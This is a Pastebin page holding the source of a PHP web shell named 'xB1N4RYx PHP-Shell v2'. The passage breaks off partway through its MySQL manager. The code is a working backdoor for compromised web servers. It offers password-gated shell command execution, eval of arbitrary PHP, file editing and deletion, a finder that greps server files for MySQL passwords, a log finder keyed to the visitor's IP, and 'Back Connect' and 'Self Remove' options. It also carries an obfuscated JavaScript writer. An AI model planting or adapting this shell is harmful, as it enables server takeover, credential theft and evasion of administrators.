API tools faq
paste
Advertisement
fiftytwohartzwhale

Untitled

fiftytwohartzwhale
Oct 26th, 2021
34
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 32.97 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $u = "hf";
  3. $p = "123e6b6dac9310d2752a16d523bcbda9dd760d1adab999c97836eb7fcae2935f5be801b3fcbaec7bcd7ee6933b9271b99dc2cd861db4b9f5a80ac079baf3027c";
  4.  
  5. ob_start();
  6. session_start();
  7. @set_magic_quotes_runtime(0);
  8. set_time_limit(0);
  9. error_reporting(0);
  10. $windows = 0;
  11.  
  12. function recurse_zip($src,&$zip,$path_length) {
  13.         $dir = opendir($src);
  14.         while(false !== ( $file = readdir($dir)) ) {
  15.             if (( $file != '.' ) && ( $file != '..' )) {
  16.                 if ( is_dir($src . '/' . $file) ) {
  17.                     recurse_zip($src . '/' . $file,$zip,$path_length);
  18.                 }
  19.                 else {
  20.                     $zip->addFile($src . '/' . $file,substr($src . '/' . $file,$path_length));
  21.                 }
  22.             }
  23.         }
  24.         closedir($dir);
  25. }
  26. function compress($src, $xX)
  27. {
  28.         if(substr($src,-1)==='/'){$src=substr($src,0,-1);}
  29.         $arr_src=explode('/',$src);
  30.         $filename=$src;
  31.         unset($arr_src[count($arr_src)-1]);
  32.         $path_length=strlen(implode('/',$arr_src).'/');
  33.         $f=explode('.',$filename);
  34.         $filename=$f[0];
  35.         $filename=(($filename=='')? $xX : $xX);
  36.         $zip = new ZipArchive;
  37.         $res = $zip->open($filename, ZipArchive::CREATE);
  38.         if($res !== TRUE){
  39.                 echo 'Error: Unable to create zip file';
  40.                 exit;}
  41.         if(is_file($src)){$zip->addFile($src,substr($src,$path_length));}
  42.         else{
  43.                 if(!is_dir($src)){
  44.                      $zip->close();
  45.                      @unlink($filename);
  46.                      echo 'Error: File not found';
  47.                      exit;}
  48.         recurse_zip($src,$zip,$path_length);}
  49.         $zip->close();
  50.         //exit;
  51. }
  52.  
  53. function get_string_between($string, $start, $end){
  54.     $string = " ".$string;
  55.     $ini = strpos($string,$start);
  56.     if ($ini == 0) return "";
  57.     $ini += strlen($start);
  58.     $len = strpos($string,$end,$ini) - $ini;
  59.     return substr($string,$ini,$len);
  60. }
  61.  
  62. function func_enabled($func){
  63.     $disabled = explode(',', ini_get('disable_functions'));
  64.     foreach ($disabled as $dis){
  65.         if($dis == $func)
  66.         return false;
  67.     }
  68.     return true;
  69. }
  70.  
  71. function binary_shell($cmd){
  72.     if(func_enabled("shell_exec"))
  73.         return shell_exec($cmd);
  74.     else if(func_enabled("exec"))
  75.         return exec($cmd);
  76.     else if(func_enabled("system"))
  77.         return system($cmd);
  78.     else if(func_enabled("passthru"))
  79.         return passthru($cmd);
  80. }
  81.  
  82. function fExt($filename)
  83. {
  84.     $path_info = pathinfo($filename);
  85.     return $path_info['extension'];
  86. }
  87.  
  88. $images = array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff");
  89. $movies = array("avi","mpg","mpeg");
  90.  
  91. $user = $_POST['zun'];
  92. $pass = hash("sha512", $_POST['zpw']);
  93. $pazz = $p;
  94.  
  95. if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz)
  96. {
  97.     $_SESSION['zusrn'] = $user;
  98.     $_SESSION['zpass'] = $pass;
  99. }
  100.  
  101. if($_GET['page'] == "phpinfo"){
  102.     if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz){
  103.     echo '<title>xB1N4RYx</title>';
  104.     phpinfo();
  105.     return;}
  106. }
  107. echo '
  108. <html>
  109. <head>
  110. <title>xB1N4RYx</title>
  111. <script type="text/javascript" language="javascript">
  112. <!--
  113. ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
  114. MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
  115. OT="";
  116. for(j=0;j<MI.length;j++){
  117. OT+=ML.charAt(MI.charCodeAt(j)-48);
  118. }document.write(OT);
  119. // --></script>
  120. </head>
  121. <style>
  122. hr{
  123.     border: 1px solid #444444;
  124. }
  125. body{
  126. background: #000000;
  127. color: #CCCCCC;
  128. font-family: Verdana, Times New Roman;
  129. font-size: 11px;
  130. }
  131.  
  132. table{
  133. background: #000000;
  134. color: #CCCCCC;
  135. font-family: Verdana, Times New Roman;
  136. font-size: 11px;
  137. }
  138.  
  139. a:link{
  140. text-decoration: none;
  141. font-weight: bold;
  142. color: #888888;
  143. }
  144.  
  145. a:visited{
  146. text-decoration: none;
  147. font-weight: normal;
  148. color: #888888;
  149. }
  150.  
  151. a:active{
  152. text-decoration: none;
  153. font-weight: normal;
  154. color: #CC0000;
  155. }
  156.  
  157. a:hover{
  158. text-decoration: bold;
  159. font-weight: bold;
  160. color: #666666;
  161. }
  162.  
  163. #links{
  164. margin-top: 12px;
  165. margin-left: 10px;
  166. }
  167.  
  168. textarea{
  169. border: 1px solid #770000;
  170. background: #000000;
  171. color: #CCCCCC;
  172. font-family: Verdana, Times New Roman;
  173. font-size: 10px;
  174. }
  175.  
  176. #crypts{
  177. margin-top: -6px;
  178. }
  179.  
  180. #crypts input{
  181. color: #CCCCCC;
  182. background: #000000;
  183. border: 0px;
  184. text-align: center;
  185. }
  186.  
  187. #submit input{
  188. color: #CCCCCC;
  189. background: #000000;
  190. border: 1px solid #770000;
  191. text-align: center;
  192. }
  193.  
  194. #submits{
  195. margin-top: -24px;
  196. margin-left: 359px;
  197. }
  198.  
  199. #text input{
  200. color: #CCCCCC;
  201. background: #000000;
  202. border: 1px solid #770000;
  203. text-align: left;
  204. }
  205.  
  206. #dirs a:link{
  207. text-decoration: none;
  208. font-weight: none;
  209. font-size: 10px;
  210. color: #008888;
  211. }
  212.  
  213. #dirs a:visited{
  214. text-decoration: none;
  215. font-size: 10px;
  216. font-weight: none;
  217. color: #008888;
  218. }
  219.  
  220. #dirs a:active{
  221. text-decoration: none;
  222. font-weight: none;
  223. font-size: 10px;
  224. color: #008888;
  225. }
  226.  
  227. #dirs a:hover{
  228. text-decoration: none;
  229. font-weight: none;
  230. font-size: 10px;
  231. color: #006666;
  232. }
  233.  
  234. #files a:link{
  235. text-decoration: none;
  236. font-weight: none;
  237. font-size: 10px;
  238. color: #CCCCCC;
  239. }
  240.  
  241. #files a:visited{
  242. text-decoration: none;
  243. font-size: 10px;
  244. font-weight: none;
  245. color: #CCCCCC;
  246. }
  247.  
  248. #files a:active{
  249. text-decoration: none;
  250. font-weight: none;
  251. font-size: 10px;
  252. color: #CCCCCC;
  253. }
  254.  
  255. #files a:hover{
  256. text-decoration: none;
  257. font-weight: none;
  258. font-size: 10px;
  259. color: #888888;
  260. }
  261.  
  262. #pd a:link{
  263. text-decoration: none;
  264. font-weight: none;
  265. color: #0066BB;
  266. }
  267.  
  268. #pd a:visited{
  269. text-decoration: none;
  270. font-weight: none;
  271. color: #0066BB;
  272. }
  273.  
  274. #pd a:active{
  275. text-decoration: none;
  276. font-weight: none;
  277. color: #0066BB;
  278. }
  279.  
  280. #pd a:hover{
  281. text-decoration: none;
  282. font-weight: none;
  283. color: #0055AA;
  284. }
  285.  
  286. #login input{
  287. color: #CCCCCC;
  288. background: #000000;
  289. border: 1px solid #660000;
  290. border-radius: 5px;
  291. text-align: center;
  292. }
  293.  
  294. #phpe textarea{
  295. color: #CCCCCC;
  296. background: #000000;
  297. border: 1px solid #660000;
  298. border-radius: 7px;
  299. text-align: center;
  300. }
  301.  
  302. #cpath a:link{
  303. color: #0066BB;
  304. }
  305.  
  306. #cpath a:visited{
  307. color: #0066BB;
  308. }
  309.  
  310. #cpath a:active{
  311. color: #0066BB;
  312. }
  313.  
  314. #cpath a:hover{
  315. color: #0077CC;
  316. }
  317.  
  318. </style>
  319. <body>';
  320.  
  321. function endsWith($haystack, $needle)
  322. {
  323.     $length = strlen($needle);
  324.     $start  = $length * -1; //negative
  325.     return (substr($haystack, $start) === $needle);
  326. }
  327. if(endsWith($_GET['dir'], "\\")){ $dslash = ""; }
  328. else{ $dslash = "/"; }
  329. if(endsWith(realpath($_SESSION['current_folder']), "/") || endsWith(realpath($_SESSION['current_folder']), "\\")){ $cslash = ""; }
  330. else{ $cslash = "/"; }
  331. if($_GET['page'] == "list"){
  332. if(!isset($_SESSION['current_folder'])){ $_SESSION['current_folder'] = "./"; }
  333. else{
  334. if(is_dir(realpath($_SESSION['current_folder']).$cslash.$_GET['dir']))
  335.     $_SESSION['current_folder'] = realpath($_SESSION['current_folder']).$cslash.$_GET['dir'];
  336. }
  337. }
  338. echo '
  339. <table border="0" style="border: 0px solid #444444;" width="100%" height="100px">
  340. <tr>
  341. <td width="110px" style="text-align: right; padding-right: 5px;" valign="top">
  342. <b><font color="#555555">
  343. Software:&nbsp;<br>OS:&nbsp;<br>User:&nbsp;<br>PHP Version:&nbsp;<br>MySQL Version:&nbsp;<br>Server IP:&nbsp;<br>Safemode:&nbsp;<br>Disabled Funcs:&nbsp;<br>Disk Info:&nbsp;<br>Current Folder:&nbsp;<br>Shell Folder:&nbsp;
  344. </font></b>
  345. </td>
  346. <td valign="top">
  347. <b><font color="#777777" valign="top">';
  348. $ts = disk_total_space("/")/1024/1024/1024;// IN GB
  349. $fs = disk_free_space("/")/1024/1024/1024;// IN GB
  350. $soft = str_replace("PHP/".phpversion()."", "", getenv("server_software"));
  351. echo $soft.'<br>';
  352. echo wordwrap(php_uname(),90," ",1).'<br>';
  353. echo binary_shell("id").'<br>';
  354. echo phpversion().'<br>';
  355. echo mysql_get_client_info().'<br>';
  356. echo getenv("server_name").'&nbsp;/&nbsp;'.gethostbyname(getenv("server_name")).'<br>';
  357. if (strtolower(@ini_get("safe_mode")) == "on" || @ini_get("safe_mode") == true)
  358. { echo '<font color="#990000">On</font><br>'; }
  359. else{ echo '<font color="#009900">Off</font><br>'; }
  360. if(@ini_get("disable_functions") == "")
  361.     echo "<font color='#009900'>None</font><br>";
  362. else
  363.     echo '<font color="#990000">'.@ini_get("disable_functions").'</font><br>';
  364. echo round($fs, 2).'&nbsp;GB&nbsp;Free'.'&nbsp;of&nbsp;Total&nbsp;'.round($ts, 2).'&nbsp;GB'.'&nbsp;('.round(100/($ts/$fs), 2).'%)<br>';
  365. if(preg_match("/\//i", realpath($_SESSION['current_folder']))){
  366.     $cpaths = explode('/', realpath($_SESSION['current_folder']));
  367.     $pathslash = '/';
  368. }
  369. else{
  370.     $cpaths = explode('\\', realpath($_SESSION['current_folder']));
  371.     $pathslash = '\\';
  372. }
  373. echo '<div id="cpath">';
  374. $asdAsD = 0;
  375. foreach($cpaths as $paths){
  376.     $buffer .= $paths.$pathslash;
  377.     if($asdAsD <= count($cpaths)-2){
  378.         echo '<a href="?page=go&goto='.$buffer.'">'.$paths.'</a><font color="#0066BB">'.$pathslash.'</font>';
  379.     }
  380.     else{
  381.         echo '<a href="?page=go&goto='.$buffer.'">'.$paths.'</a>';
  382.     }
  383.     $asdAsD++;
  384. }
  385. echo '</div>';
  386. //'.realpath($_SESSION['current_folder']).'
  387. //echo '<div id="cpath">';
  388. //echo ''.realpath($_SESSION['current_folder']).'</a></div>';
  389. //echo '<div id="cpath"><a href="?page=go&goto=/">'.realpath($_SESSION['current_folder']).'</a></div>';
  390. echo '<font color="#6C1B0A">'.realpath("./").'</font><br>';
  391. echo '
  392. </font></b>
  393. </td>
  394. <td style="text-align: right; padding-right: 5px;" valign="top">';
  395.  
  396. echo '<b><font color="#555555">Your IP: <font color="#777777">'.getenv("remote_addr").'</font></font></b>';
  397. if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz)
  398.     echo '<br><a href="?page=logout">Logout</a>';
  399. if(isset($_SESSION['muser']))
  400.     echo '<br><a href="?page=mylogout">MySQL Logout</a>';
  401.    
  402. echo '
  403. </td>
  404. </tr>
  405.  
  406. </table>
  407. <div id="links">
  408. <a href="?page=list">List Files</a>&nbsp;&nbsp;&nbsp;
  409. <a href="?page=crypt">Encrypt</a>&nbsp;&nbsp;&nbsp;
  410. <a href="?page=shell">Shell Execute</a>&nbsp;&nbsp;&nbsp;
  411. <a href="?page=go">Go To</a>&nbsp;&nbsp;&nbsp;
  412. <a href="?page=cf">Create File</a>&nbsp;&nbsp;&nbsp;
  413. <!--<a href="?page=df">Delete File</a>&nbsp;&nbsp;&nbsp;-->
  414. <a href="?page=cfo">Create Folder</a>&nbsp;&nbsp;&nbsp;
  415. <!--<a href="?page=dfo">Delete Folder</a>&nbsp;&nbsp;&nbsp;-->
  416. <a href="?page=mysql">MySQL Manager</a>&nbsp;&nbsp;&nbsp;
  417. <a href="?page=php">PHP Executer</a>&nbsp;&nbsp;&nbsp;
  418. <a href="?page=phpinfo" target="_blank">PHP Info</a>&nbsp;&nbsp;&nbsp;
  419. <a href="?page=upload">Upload File</a>&nbsp;&nbsp;&nbsp;
  420. <a href="?page=bcon">Back Connect</a>&nbsp;&nbsp;&nbsp;
  421. <a href="?page=sr"><font color="#CC0000">!</font> Self Remove <font color="#CC0000">!</font></a>&nbsp;&nbsp;&nbsp;
  422. <a href="?page=findlogs"><font color="#0189d2">!</font> Log Finder <font color="#0189d2">!</font></a>&nbsp;&nbsp;&nbsp;
  423. <a href="?page=findmysql"><font color="#02fe28">!</font> MySQL PW Finder <font color="#02fe28">!</font></a>&nbsp;&nbsp;&nbsp;
  424. </div>
  425. <br>
  426.  
  427. <table border="0" style="border: 1px solid #444444; padding: 5px;" width="100%">
  428. <tr>
  429. <td valign="top">';
  430.  
  431. if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz)
  432. {
  433. echo '<form action="'.$php_self.'" method="post">';
  434. echo '<center>';
  435. echo 'xB1N4RYx PHP-Shell v2<br><br>';
  436. echo 'Username:<br><div id="login"><input type="text" id="zun" name="zun" maxlength="10"/><br><br>';
  437. echo 'Password:<br><input type="password" id="zpw" name="zpw" maxlength="10"/><br>';
  438. echo '</div><div id="submit"><input type="submit" value="Login"/>';
  439. echo '</div>';
  440. echo '</center>';
  441. echo '</form>';
  442. return;
  443. }
  444.  
  445. function fsize($file){
  446. if(filesize($file) == 0)
  447.     return "~";
  448. if(filesize($file) < 0)
  449.     return "2 GB+";
  450. if(round(filesize($file)/1024/1024, 1) >= 1024)
  451.     return round(filesize($file)/1024/1024/1024, 1)." GB";
  452. if(round(filesize($file)/1024, 1) >= 1024)
  453.     return round(filesize($file)/1024/1024, 1)." MB";
  454. return round(filesize($file)/1024, 1)." KB";
  455. }
  456.  
  457. switch($_GET['page']){
  458.     default:
  459.         echo '<center>xB1N4RYx PHP-Shell v2</center>';
  460.     break;
  461.  
  462.     case "findlogs":
  463.         $fi = fopen("log.pl","w");
  464.         fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");');
  465.         fclose($fi);
  466.         $sh = binary_shell("perl log.pl ".getenv("remote_addr"));
  467.         $files = explode("\r\n",$sh);
  468.         echo "<center>Possible log files:<br><br>";
  469.         foreach($files as $file){
  470.             $f = get_string_between($file,"/",":");
  471.             $fa = '/'.get_string_between($file,"/","No such file");
  472.             if($f != "")
  473.                 echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."<br>";
  474.         }
  475.         echo "</center>";
  476.         unlink("log.pl");
  477.     break;
  478.    
  479.     case "findmysql":
  480.         $fi = fopen("sql.pl","w");
  481.         fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");');
  482.         fclose($fi);
  483.         $sh = binary_shell("perl sql.pl mysql_connect");
  484.         $files = explode("\r\n",$sh);
  485.         echo "<center>Possible mysql password files:<br><br>";
  486.         foreach($files as $file){
  487.             $f = get_string_between($file,"/",":");
  488.             $fa = '/'.get_string_between($file,"/","No such file");
  489.             if($f != "")
  490.                 echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."<br>";
  491.         }
  492.         echo "</center>";
  493.         unlink("sql.pl");
  494.     break;
  495.  
  496.     case "removelogs":
  497.        
  498.     break;
  499.    
  500.     case "list":
  501.         $dir = @opendir($_SESSION['current_folder']);
  502.         $xazz = 0;
  503.         if(!$dir){ $_SESSION['current_folder'] = "./"; }
  504.         echo '<table border="0" width="100%" cellspacing="0">';
  505.         echo '<tr><td width="35%"><div id="pd"><a href="?page=list&dir=..">&nbsp;&nbsp;&nbsp;Parent Directory</a></div></td><td width="20%"><center>File Size</center></td><td width="15%"><center>Extra Options</center></td><td width="15%"><center>Permissions</center></td><td width="*"><center>Options</center></td></tr>';
  506.         while (($dirs = @readdir($dir)) != false){
  507.             $color = array("#000000","#111111","#444444");
  508.         if(is_dir(realpath($_SESSION['current_folder'])."/".$dirs) && $dirs != "." && $dirs != ".."){
  509.             if($xazz == 1)
  510.                 $xazz--;
  511.             else
  512.                 $xazz++;
  513.             echo '<tr bgcolor="'.$color[$xazz].'" onMouseOver="this.bgColor=\''.$color[2].'\'" onMouseOut="this.bgColor=\''.$color[$xazz].'\'"><td><div id="dirs"><a href="?page=list&dir='.$dirs.'">'.$dirs.'</a></div></td><td><center>&nbsp;</center></td><td>&nbsp;</td><td>&nbsp;</td><td><center><a href="?page=downloadzip&f='.$dirs.'">Download</a>&nbsp;~&nbsp;<a href="?page=dfo&f='.$dirs.'">Delete</a></center></td></tr>';
  514.         }}
  515.         echo '<tr><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td><td><hr style="border: 1px solid #444444;"/></td></tr>';
  516.         $nondir = @opendir(realpath($_SESSION['current_folder']));
  517.         while (($files = @readdir($nondir)) != false){
  518.         if(!is_dir(realpath($_SESSION['current_folder'])."/".$files)){
  519.             if($xazz == 1)
  520.                 $xazz--;
  521.             else
  522.                 $xazz++;
  523.             echo '<tr bgcolor="'.$color[$xazz].'" onMouseOver="this.bgColor=\''.$color[2].'\'" onMouseOut="this.bgColor=\''.$color[$xazz].'\'"><td><div id="files"><a href="?page=view&file='.$files.'">'.$files.'</a></div></td><td><center>'.fsize(realpath($_SESSION['current_folder']).$cslash.$files).'</center></td>';
  524.             echo '<td>';
  525.             if(is_executable(realpath($_SESSION['current_folder']).$cslash.$files))
  526.                 echo '<center><a href="?page=stask&f='.$files.'">Start</a>&nbsp;~&nbsp;<a href="?page=ktask&f='.$files.'">Kill</a></center>';
  527.             else
  528.                 echo '&nbsp;';
  529.             $permissions = is_writeable($files);
  530.             if($permissions == true)
  531.                 $perms = '<font color="#00CC00"><b>Editable</b></font>';
  532.             else
  533.                 $perms = '<font color="#CC0000"><b>Locked</b></font>';
  534.             echo '<td>';
  535.             echo '<center>'.$perms.'</center>';
  536.             echo '</td>';
  537.             echo '</td>';
  538.             echo '<td><center><a href="?page=view&file='.$files.'&fc=1">Edit</a>&nbsp;~&nbsp;<a href="?page=downloadfile&f='.$files.'">Download</a>&nbsp;~&nbsp;<a href="?page=df&f='.$files.'">Delete</a></center></td></tr>';
  539.         }}
  540.         closedir($dir);
  541.         closedir($nondir);
  542.         echo '</table>';
  543.     break;
  544.    
  545.     case "crypt":
  546.         echo '<center>';
  547.             echo '<form action="?page=crypt" method="post">';
  548.             echo 'Input:<br><textarea rows="6" cols="45" id="ctext" name="ctext">'.$_POST['ctext'].'</textarea><br><br>';
  549.             echo '<div id="submit">';
  550.             echo '<input type="submit" value="Hash">';
  551.             echo '</div>';
  552.             echo '</form>';
  553.             echo '<div id="crypts">';
  554.             echo '<p>md5 <br> <input type="text" size="32" readonly value="'.hash("md5", $_POST['ctext']).'"/></p>';
  555.             echo '<p>sha1 <br> <input type="text" size="41" readonly value="'.hash("sha1", $_POST['ctext']).'"/></p>';
  556.             echo '<p>sha256 <br> <input type="text" size="68" readonly value="'.hash("sha256", $_POST['ctext']).'"/></p>';
  557.             echo '<p>sha384 <br> <input type="text" size="103" readonly value="'.hash("sha384", $_POST['ctext']).'"/></p>';
  558.             echo '<p>sha512 <br> <input type="text" size="139" readonly value="'.hash("sha512", $_POST['ctext']).'"/></p>';
  559.             echo '</div>';
  560.             echo '<hr style="border: 1px solid #333333;"/><a href="http://www.md5decrypter.co.uk/sha1-decrypt.aspx" target="_blank">Decrypt SHA1/MD5 Hashes</a>';
  561.         echo '</center>';
  562.     break;
  563.    
  564.     case "shell":
  565.         $sh = binary_shell("cd ".realpath($_SESSION["current_folder"])." && ".$_POST['cmd']);
  566.         echo '<form action="?page=shell" method="post">';
  567.         echo '<textarea rows="10" cols="80" readonly>'.$sh.'</textarea>';
  568.         echo '<br><div id="text">';
  569.         echo '<input type="text" name="cmd" id="cmd" style="margin-top: 3px; border-radius: 3px;" size="53"/>';
  570.         echo '<input type="submit" style="margin-left: 5px; border-radius: 3px; marign-top: 3px;" value="Execute"/>';
  571.         echo '</form>';
  572.     break;
  573.    
  574.     case "view":
  575.         $file = $_GET['file'];
  576.         $fc = $_GET['fc'];
  577.         if(!isset($fc)){ $fc = 0; }
  578.         if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $images, true) && $fc != 1){ echo '<center>Viewing Image<br>[ '.$file.' ]<hr/><a href="?page=downloadfile&f='.$file.'"><img src="?page=viewimage&i='.$file.'" border="0" style="padding: 10px;" alt="Download Image"/></a></center>'; break; }
  579.         if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $movies, true) && $fc != 1){ echo '<center><a href="?page=downloadfile&f='.$file.'"><object data="?page=viewmovie&i='.$file.'" type="video/quicktime" width="320" height="255"> <param name="src" value="?page=viewmovie&i='.$file.'"><param name="autoplay" value="false"><param name="autoStart" value="0"></object></center>'; break; }
  580.         $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$file), "r");
  581.         $fr = @fread($fo, filesize(realpath($_SESSION["current_folder"].$cslash.$file)));
  582.         echo '<form action="?page=saveedit" method="post">';
  583.         echo '<center>Editing '.realpath($_SESSION["current_folder"].$cslash.$file).'<br><a href="?page=highlight&file='.$file.'">Highlight PHP</a><br><br><div id="submit"><input type="submit" value="Save"/></div>';
  584.         echo '<textarea rows="54" cols="120" id="ctext" name="ctext">'.htmlspecialchars($fr).'</textarea>';
  585.         echo '<input type="hidden" value="'.$file.'" name="file" id="file" />';
  586.         echo '</center>';
  587.         echo '</form>';
  588.         fclose($fo);
  589.     break;
  590.    
  591.     case "saveedit":
  592.         $fs = $_POST['file'];
  593.         $fd = $_POST['ctext'];
  594.         if (get_magic_quotes_gpc()){
  595.     if (!function_exists("strips")){
  596.         function strips(&$arr,$k=""){
  597.             if (is_array($arr)){
  598.             foreach($arr as $k=>$v){
  599.                 if (strtoupper($k) != "GLOBALS"){
  600.                     strips($arr["$k"]);
  601.                                                 }
  602.                                     }
  603.                                 }
  604.     else{
  605.     $arr = stripslashes($arr);
  606.         }
  607.                                     }
  608.                                    }
  609.     strips($GLOBALS);
  610. }
  611.        
  612.         $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "w");
  613.         $fo2 = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "r");
  614.         $fw = @fwrite($fo, $fd);
  615.         $fr = @fread($fo2, filesize(realpath($_SESSION["current_folder"].$cslash.$fs)));
  616.         echo '<form action="?page=saveedit" method="post">';
  617.         echo '<center><h3>Saved!</h3>Editing '.realpath($_SESSION["current_folder"].$cslash.$fs).'<br><a href="?page=highlight&file='.$fs.'">Highlight PHP</a><br><br><div id="submit"><input type="submit" value="Save"/></div>';
  618.         echo '<textarea rows="54" cols="120" id="ctext" name="ctext">'.htmlspecialchars($fr).'</textarea>';
  619.         echo '<input type="hidden" value="'.$fs.'" name="file" id="file" />';
  620.         echo '</center>';
  621.         echo '</form>';
  622.         fclose($fo);
  623.         fclose($fo2);
  624.     break;
  625.    
  626.     case "highlight":
  627.         $fil = $_GET['file'];
  628.         $filz = realpath($_SESSION["current_folder"].$cslash.$fil);
  629.         echo '<tr>';
  630.         echo '<center><td bgcolor="#000000">';
  631.         echo '<center>Highlighting '.realpath($_SESSION["current_folder"].$cslash.$fil).'<br><a href="?page=view&file='.$fil.'">Edit</a>';
  632.         echo '</td></tr><tr>';
  633.         echo '<center><td bgcolor="#CCCCCC">';
  634.         $hl = highlight_file($filz, true);
  635.         echo $hl;
  636.         echo '</td></tr></center>';
  637.     break;
  638.    
  639.     case "logout":
  640.         session_destroy();
  641.         echo '<script type="text/javascript">location.href="?page=login";</script>';
  642.     break;
  643.    
  644.     case "mylogout":
  645.         unset($_SESSION['mhost']);
  646.         unset($_SESSION['mport']);
  647.         unset($_SESSION['muser']);
  648.         unset($_SESSION['mpass']);
  649.         unset($_SESSION['mlog']);
  650.         echo '<script type="text/javascript">location.href="?page=mysql";</script>';
  651.     break;
  652.    
  653.     case "go":
  654.         $goto = $_GET['goto'];
  655.         if(!isset($goto)){
  656.             echo '<form action="?page=go" method="get">';
  657.             echo '<div id="login" style="margin-left: 10px; margin-top: 10px;"><input type="hidden" name="page" value="go"/><input type="text" name="goto" id="goto" value="/"/><input type="submit" value="Go"/></div>';
  658.             echo '</form>';
  659.         }
  660.         else{
  661.             $_SESSION["current_folder"] = $goto;
  662.             echo '<script type="text/javascript">location.href="?page=list";</script>';
  663.         }
  664.     break;
  665.    
  666.     case "cf":
  667.         $ff = $_POST['fc'];
  668.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  669.         echo '<center>';
  670.         if(isset($ff)){
  671.             if(file_exists($f)){ echo 'File Already Exists!'; }
  672.             else{
  673.             echo 'Done!';
  674.             $fo = @fopen($f, "w");
  675.             fwrite($fo, "File Created By xB1N4RYx PHP-Shell v2");
  676.             fclose($fo);
  677.             }
  678.         }
  679.         echo '<br>Create File';
  680.         echo '<form action="?page=cf" method="post">';
  681.         echo '<div id="login"><input type="text" name="fc" id="fc" /></div><div id="submit"><input type="submit" value="Create"/></div>';
  682.         echo '</form>';
  683.         echo '</center>';
  684.     break;
  685.    
  686.     case "df":
  687.         $ff = $_GET['f'];
  688.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  689.         echo '<center>';
  690.         if(isset($ff)){
  691.             if(file_exists($f)){
  692.                 unlink($f);
  693.                 echo 'Done!';
  694.             }
  695.             else{
  696.                 echo 'File Doesnt Exist!';
  697.             }
  698.         }
  699.         echo '<br>Delete File';
  700.         echo '<form action="?page=df" method="post">';
  701.         echo '<div id="login"><input type="text" name="fd" id="fd" /></div><div id="submit"><input type="submit" value="Delete"/></div>';
  702.         echo '</form>';
  703.         echo '</center>';
  704.         if(!isset($_GET['noredirect']))
  705.             echo '<script type="text/javascript">location.href="?page=list";</script>';
  706.     break;
  707.    
  708.     case "cfo":
  709.         $ff = $_POST['fco'];
  710.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  711.         echo '<center>';
  712.         if(isset($ff)){
  713.             if(file_exists($f)){ echo 'Folder Already Exists!'; }
  714.             else{
  715.             echo 'Done!';
  716.             mkdir($f, 0777);
  717.             }
  718.         }
  719.         echo '<br>Create Folder';
  720.         echo '<form action="?page=cfo" method="post">';
  721.         echo '<div id="login"><input type="text" name="fco" id="fco" /></div><div id="submit"><input type="submit" value="Create"/></div>';
  722.         echo '</form>';
  723.         echo '</center>';
  724.     break;
  725.    
  726.     case "dfo":
  727.         $ff = $_GET['f'];
  728.         $f = realpath($_SESSION['current_folder'])."/".$ff;
  729.         echo '<center>';
  730.         if(isset($ff)){
  731.             if(!file_exists($f)){ echo 'Folder Doesnt Exist!'; }
  732.             else{
  733.             echo 'Done!';
  734.             rmdir($f);
  735.             }
  736.         }
  737.         echo '<script type="text/javascript">location.href="?page=list";</script>';
  738.     break;
  739.    
  740.     case "php":
  741.         $phpc = $_POST['phpc'];
  742.         echo '<center><b>PHP Code Execution</b><br><br>Result<br><div id="phpe"><textarea rows="5" cols="60" readonly>';
  743.         eval(stripslashes($phpc));
  744.         echo '</textarea><br><br>';
  745.         echo '<form action="?page=php" method="post">';
  746.         echo 'Code<br><textarea rows="5" cols="60" name="phpc" id="phpc"></textarea></div>';
  747.         echo '<div id="submit"><input type="submit" value="Execute!" /></div></form></center>';
  748.     break;
  749.    
  750.     case "mysql":
  751.         $host = $_POST['host'];
  752.         $port = $_POST['port'];
  753.         $user = $_POST['user'];
  754.         $pass = $_POST['pass'];
  755.         if(!isset($_SESSION['muser'])){
  756.         echo '<center><form action="?page=mysql" method="post">';
  757.         echo '<div id="login">';
  758.         echo 'Host:<br><input type="text" id="host" name="host" value="127.0.0.1"/><br><br>';
  759.         echo 'Port:<br><input type="text" id="port" name="port" value="3306"/><br><br>';
  760.         echo 'User:<br><input type="text" id="user" name="user" value="root"/><br><br>';
  761.         echo 'Password:<br><input type="text" id="pass" name="pass"/><br><br>';
  762.         echo '</div>';
  763.         echo '<div id="submit"><input type="submit" value="Connect"/></div>';
  764.         echo '</form></center>';}
  765. //      else{
  766.         if(isset($user)){
  767.             $_SESSION['mhost'] = $host;
  768.             $_SESSION['mport'] = $port;
  769.             $_SESSION['muser'] = $user;
  770.             $_SESSION['mpass'] = $pass;}
  771.             if(isset($_SESSION['muser'])){
  772.                 $l = mysql_connect($_SESSION['mhost'].":".$_SESSION['mport'], $_SESSION['muser'], $_SESSION['mpass']);
  773.                 if(!$l){
  774.                     unset($_SESSION['mhost']);
  775.                     unset($_SESSION['mport']);
  776.                     unset($_SESSION['muser']);
  777.                     unset($_SESSION['mpass']);
  778.                     unset($_SESSION['mlog']);
  779.                     die("Can't Connect To MySQL");
  780.                 }
  781.                     if($_SESSION['mlog'] < 1)
  782.                         echo '<script type="text/javascript">location.href="?page=mysql";</script>';
  783.                     $_SESSION['mlog'] = 1;
  784.                 }
  785. //      }
  786.         if(isset($_SESSION['muser'])){
